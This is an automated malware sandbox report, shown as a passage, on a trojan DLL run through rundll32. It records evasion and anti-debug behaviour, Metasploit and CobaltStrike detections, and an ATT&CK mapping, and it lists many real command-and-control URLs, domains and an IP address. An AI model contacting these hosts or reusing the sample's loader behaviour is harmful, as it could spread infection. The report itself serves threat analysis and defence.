                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39882
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34591
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37636
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36974
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34847
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31728
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41887
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44585
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38598
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32366
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43497
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41677
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40858
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44908
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31040
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34510
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44802
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31888
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30663
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41020
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43897
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38718
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36873
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31224
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32067
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34611
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41748
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34000
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35422
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40403
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44885
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34975
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35503
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34739
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35501
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40215
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37460
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43089
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40844
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32455
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34475
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44090
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38291
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39913
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32697
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39411
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38350
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40576
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39408
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40852
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44638
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32580
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42823
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32155
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33625
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41754
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41681
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43341
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44082
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38359
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39329
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32906
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36881
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38243
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36517
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33934
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39064
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39057
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32868
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32209
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35344
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33498
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34405
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43822
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31742
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41976
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34340
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32625
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36414
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43713
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42583
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36476
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42197
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34862
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32809
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39806
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40117
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44355
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38138
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31075
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43753
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43990
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43044
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36037
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38678
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32126
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44450
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44799
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38523
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38741
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35626
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33137
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32007
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32287
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38936
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32274
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32972
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35138
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44155
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33642
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36809
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38133
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40317
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34721
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44762
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41348
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42440
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37233
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32979
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44544
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38659
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32529
                  Source: WerFault.exe, 00000006.00000002.282995617.0000000004EF8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00967154 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SendMessageA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,EndDeferWindowPos,GetProcAddress,BeginDeferWindowPos,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B29BA1 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\loaddll32.exeMemory protected: page write copy | page execute and write copy | page guard
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
                  Source: loaddll32.exe, 00000000.00000002.517830788.0000000001120000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.254606173.0000000003030000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
                  Source: loaddll32.exe, 00000000.00000002.517830788.0000000001120000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.254606173.0000000003030000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: loaddll32.exe, 00000000.00000002.517830788.0000000001120000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.254606173.0000000003030000.00000002.00020000.sdmpBinary or memory string: Progman
                  Source: loaddll32.exe, 00000000.00000002.517830788.0000000001120000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.254606173.0000000003030000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetACP,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04578325 cpuid
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00949854 GetLocalTime,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0094BD4C GetVersionExA,
                  Source: C:\Windows\System32\loaddll32.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 BlobJump to behavior

                  Remote Access Functionality:

                  barindex
                  Yara detected Metasploit PayloadShow sources
                  Source: Yara matchFile source: 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.516568277.00000000009F0000.00000004.00000020.sdmp, type: MEMORY
                  Yara detected CobaltStrikeShow sources
                  Source: Yara matchFile source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsNative API1Application Shimming1Application Shimming1Disable or Modify Tools11Input Capture11System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection12Deobfuscate/Decode Files or Information1LSASS MemoryPeripheral Device Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesInput Capture11Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSystem Information Discovery25Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptModify Registry1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion11Cached Domain CredentialsSecurity Software Discovery121VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection12DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemVirtualization/Sandbox Evasion11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  p2SijKiqgZ.dll16%ReversingLabsWin32.Trojan.Convagent

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  0.2.loaddll32.exe.810000.0.unpack100%AviraHEUR/AGEN.1108767Download File
                  3.0.rundll32.exe.940000.4.unpack100%AviraHEUR/AGEN.1108767Download File
                  3.0.rundll32.exe.940000.0.unpack100%AviraHEUR/AGEN.1108767Download File
                  3.2.rundll32.exe.940000.0.unpack100%AviraHEUR/AGEN.1108767Download File

                  Domains

                  SourceDetectionScannerLabelLink
                  lendbiz.vn0%VirustotalBrowse
                  hoteloaktree.com0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://mohsinkhanfoundation.com/pcQLeLMbur/GAUAID5zCzE+BzoOJAtGenN5Yn59cmV+YXw=0%Avira URL Cloudsafe
                  http://hoteloaktree.com/QthLWsZsVgb/OQsaDixzHTgtfjMcGypGenN5Yn59cmV+YXw=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/HiYFeTpyPng4KCF4Pzk8EQgqOQkgOA0PBUJ7cn5henxzYn1lfQ==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/eDkkAA0bInx9RnpzeWJ+fXJlfmF80%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/EgwSFkZ6c3lifn1yZX5hfA==0%Avira URL Cloudsafe
                  mohsinkhanfoundation.com/pcQLeLMbur0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/LjI+JSoqJQ4lBiwyAhR7KngvHgopKBhFfnJ4ZX15c2R5Yng=0%Avira URL Cloudsafe
                  hoteloaktree.com/QthLWsZsVgb0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/eX0ALgEICTI4BRlyQn12eWR6endleGV70%Avira URL Cloudsafe
                  https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsfw100%Avira URL Cloudmalware
                  https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.js100%Avira URL Cloudmalware
                  1110%Avira URL Cloudsafe
                  http://ctldl.winI0%Avira URL Cloudsafe
                  https://tuxsecuritybiness.com:8080/100%Avira URL Cloudmalware
                  http://lendbiz.vn/xj3BhHtMbf/OTo6JTgvJXgEPS9DenV9ZXt9dGF5ZHw=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/LDhzdH4lGnwaNw4PfworLCkHdSkEGjIvdnMoAkV+cnhlfXlzZHlieA==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/CXwgNgIIIXMeeQkPPhYCOUN6dX1le310YXlkfA==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/P34KJnkbASUWPzEYIgcWQntyfmF6fHNifWV90%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/AjlCfXZ5ZHp6d2V4ZXs=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/P3glHSkheRgAfBMIMgUiKCMaGD4dK0J9dnlkenp3ZXhlew==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/CAsZDz1/MEJ9dnlkenp3ZXhlew==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/Hh4hIBsEGSF/JgN9ARgdOCgSRX5yeGV9eXNkeWJ40%Avira URL Cloudsafe
                  http://r3.i.lencr.org/00%URL Reputationsafe
                  tuxsecuritybiness.com100%Avira URL Cloudmalware
                  http://mohsinkhanfoundation.com/pcQLeLMbur/HDN9NScAAw8PKwEFMi0/JTI5PEZ6c3lifn1yZX5hfA==0%Avira URL Cloudsafe
                  nuevainfotech.com/xCNyTjzkoe0%Avira URL Cloudsafe
                  aterwellnessinc.com/U7D0sswwp0%Avira URL Cloudsafe
                  geosever.rs/ObHP1CHt0%Avira URL Cloudsafe
                  http://r3.i.lencr.org/0%URL Reputationsafe
                  https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsmohsinkhanfoundation.com100%Avira URL Cloudmalware
                  http://mohsinkhanfoundation.com/pcQLeLMbur/egl7fAgEMAQAAkJ7cn5henxzYn1lfQ==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/DClzfTsJDgA/AicrERgXCHsERX5yeGV9eXNkeWJ40%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/enl4GDYcBgIOewx5OBp/MiEbKDx8AkJ9dnlkenp3ZXhlew==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/MyYYFB8/BgEuIANyGHgkPAMsGDcYQ3p1fWV7fXRheWR80%Avira URL Cloudsafe
                  http://x1.c.lencr.org/00%URL Reputationsafe
                  http://x1.i.lencr.org/00%URL Reputationsafe
                  armordetailing.rs/lgfrZb4Re6WO0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/H0N6dX1le310YXlkfA==0%Avira URL Cloudsafe
                  http://r3.o.lencr.org00%URL Reputationsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/ES1CfXZ5ZHp6d2V4ZXs=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/JS4leCwTGiojLgAhfiAeJXl4JCkFHUJ9dnlkenp3ZXhlew==0%Avira URL Cloudsafe
                  https://tuxsecuritybiness.com/v100%Avira URL Cloudmalware
                  http://mohsinkhanfoundation.com/pcQLeLMbur/GB0tLyckQ3p1fWV7fXRheWR80%Avira URL Cloudsafe
                  erogholding.com/GFM1QcCFk0%Avira URL Cloudsafe
                  http://lendbiz.vn/xj3BhHtMbf/EQsPOCI9HT0CfXsGCQQcIA59PT18Q3p1fWV7fXRheWR80%Avira URL Cloudsafe
                  http://x1.i.lencr.org/0%URL Reputationsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/OhpCfXZ5ZHp6d2V4ZXs=0%Avira URL Cloudsafe
                  lendbiz.vn/xj3BhHtMbf0%Avira URL Cloudsafe
                  http://sirifinco.com/Urbhq9wO50j/ASk5Kx0SPR8lJjE5eTg9GkN6dX1le310YXlkfA==0%Avira URL Cloudsafe
                  http://sirifinco.com/Urbhq9wO50j/fXMKNg0nKzN/DA15DggBI0N6dX1le310YXlkfA==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/Hh8fPwgIJRkuIzgrOjp5HjovOkZ6c3lifn1yZX5hfA==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/ICYbCzstHxl+BhF4Jg5+GH0FRX5yeGV9eXNkeWJ40%Avira URL Cloudsafe
                  lefrenchwineclub.com/eRUGdDox0%Avira URL Cloudsafe
                  http://cps.letsencrypt.org00%URL Reputationsafe
                  acdlimited.com/2u6aW9Pfe0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/JhANAzl6Gw8FBhMABRYGcn9CfXZ5ZHp6d2V4ZXs=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/GzsaeR8FDw4qOh8mCAR2HDoCFS4bAhxFfnJ4ZX15c2R5Yng=0%Avira URL Cloudsafe
                  ordpress17.com/5WG6Z62sKWo0%Avira URL Cloudsafe
                  jornaldasoficinas.com/ZF8GKIGVDupL0%Avira URL Cloudsafe
                  sirifinco.com/Urbhq9wO50j0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/DxMffwwOHXMHeXJDenV9ZXt9dGF5ZHw=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/EgwECwQhMhk+BQkuH38nHQUtIy4GLwpFfnJ4ZX15c2R5Yng=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/fxgDNT4yEngregozMnp+J0N6dX1le310YXlkfA==0%Avira URL Cloudsafe
                  https://23.82.140.206:8080/mpersonation0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/KQsyKkZ6c3lifn1yZX5hfA==0%Avira URL Cloudsafe
                  http://lendbiz.vn/xj3BhHtMbf/cxAvGkZ6c3lifn1yZX5hfA==0%Avira URL Cloudsafe
                  sjgrand.lk/zvMYuQqEZj0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/BhkbJH0afC8dDiEzQn12eWR6endleGV70%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/ACA4KhwTDH8VH3MrOQp8GAYHIjZ4egBFfnJ4ZX15c2R5Yng=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/HiQBOhomAh0dCDgeJjoHLj8YCUZ6c3lifn1yZX5hfA==0%Avira URL Cloudsafe
                  https://tuxsecuritybiness.com/100%Avira URL Cloudmalware
                  http://lendbiz.vn/xj3BhHtMbf/fTB4IBwfOiwYPxk6GRosPCV9BAJzPwp0C3IvDkV+cnhlfXlzZHlieA==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/MSMDOB0pBQ5+OnNDenV9ZXt9dGF5ZHw=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/fSkCegETcg8VKw95Qn12eWR6endleGV70%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/cjsfHAk/MzgAfhp+DBgAGz0PeyQgQ3p1fWV7fXRheWR80%Avira URL Cloudsafe
                  http://lendbiz.vn/xj3BhHtMbf/PnwTCj8/DwIceXNDenV9ZXt9dGF5ZHw=0%Avira URL Cloudsafe
                  http://lendbiz.vn/xj3BhHtMbf/ew0TDR8RAgoIfT0bIEV+cnhlfXlzZHlieA==0%Avira URL Cloudsafe
                  orldofjain.com/lMsTA7tSYpe0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/ITIYRX5yeGV9eXNkeWJ40%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/PQAbfw19HyI5fiwAe38AIyccOiF8BwI+diQOQn12eWR6endleGV70%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/PAUpKBYYDz0bHQkGMRZ/eSJCfXZ5ZHp6d2V4ZXs=0%Avira URL Cloudsafe
                  dadabhoy.pk/m6rQE94U0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/E30FFQogECw2GiUzekV+cnhlfXlzZHlieA==0%Avira URL Cloudsafe
                  altayaralsudani.net/SSUsPgb7PHgC0%Avira URL Cloudsafe
                  http://23.82.140.206/jquery-3.3.1.slim.min.js0%Avira URL Cloudsafe
                  https://23.82.140.206:8080/0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/DCwZNSYnBRJFfnJ4ZX15c2R5Yng=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/OSdCfXZ5ZHp6d2V4ZXs=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/DRs5e3gJAw4gNkJ7cn5henxzYn1lfQ==0%Avira URL Cloudsafe
                  https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsVw100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  sirifinco.com
                  162.215.253.14
                  truetrue
                    unknown
                    lendbiz.vn
                    103.28.36.212
                    truetrueunknown
                    mohsinkhanfoundation.com
                    107.180.44.125
                    truetrue
                      unknown
                      hoteloaktree.com
                      185.67.1.94
                      truetrueunknown
                      tuxsecuritybiness.com
                      unknown
                      unknowntrue
                        unknown
                        r3.i.lencr.org
                        unknown
                        unknownfalse
                          unknown
                          ordpress17.com
                          unknown
                          unknowntrue
                            unknown
                            x1.i.lencr.org
                            unknown
                            unknownfalse
                              unknown
                              aterwellnessinc.com
                              unknown
                              unknowntrue
                                unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://mohsinkhanfoundation.com/pcQLeLMbur/GAUAID5zCzE+BzoOJAtGenN5Yn59cmV+YXw=true
                                • Avira URL Cloud: safe
                                unknown
                                http://hoteloaktree.com/QthLWsZsVgb/OQsaDixzHTgtfjMcGypGenN5Yn59cmV+YXw=false
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/HiYFeTpyPng4KCF4Pzk8EQgqOQkgOA0PBUJ7cn5henxzYn1lfQ==true
                                • Avira URL Cloud: safe
                                unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/eDkkAA0bInx9RnpzeWJ+fXJlfmF8true
                                • Avira URL Cloud: safe
                                unknown
